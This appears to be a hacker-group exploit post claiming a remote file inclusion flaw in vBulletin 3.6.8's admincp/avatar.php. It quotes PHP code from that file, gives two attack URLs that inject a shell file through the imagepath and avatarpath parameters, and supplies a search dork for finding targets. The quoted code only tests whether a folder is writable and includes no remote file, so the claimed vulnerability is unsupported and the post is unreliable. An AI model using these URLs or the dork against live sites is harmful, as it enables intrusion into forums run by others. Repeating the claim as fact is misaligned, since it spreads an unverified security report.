vBulletin 3.6.8 Remote File Include

#Exploit
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
#namer_jenin Dr_jenin@jenin.net ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
#web : http://www.u4rock.com/vb/------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# scrept:vBulletin 3.6.8

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
#Code in:
$admincp/avatar.php
#Vul code:Vul code:
{
global $vbphrase;
if ($imagepath == '')
{
print_stop_message('please_complete_required_fields');
}
if ($fp = @fopen($imagepath . '/test.image', 'wb'))
{
fclose($fp);
if (!@unlink($imagepath . '/test.image'))
{
print_stop_message('test_file_write_failed', $imagepath);
}
return true;
}
else
{
print_stop_message('test_file_write_failed', $imagepath);
}
}

$vbulletin->input->clean_array_gpc('r', array(
'avatarpath' => TYPE_STR,
'avatarurl' => TYPE_STR,
'profilepicpath' => TYPE_STR,
'profilepicurl' => TYPE_STR,
'sigpicpath' => TYPE_STR,
'sigpicurl' => TYPE_STR,
'dowhat' => TYPE_STR
));



-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
#Exploit
http://name.com/vBulletin 3.6.8/admincp/avatar.php?imagepath=sshell.txt?


http://name.com/vBulletin 3.6.8/admincp/avatar.php?avatarpath=sshell.txt?





------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
#dork: allurl"vBulletin 3.6.8"
--------------------------------------------------------------------------------------------


.: اكاديمية الهكر العربى )::.
Powered By Hell Team
--------------------------------------------------------------------------
bay bay Dr_jenin الله اكبر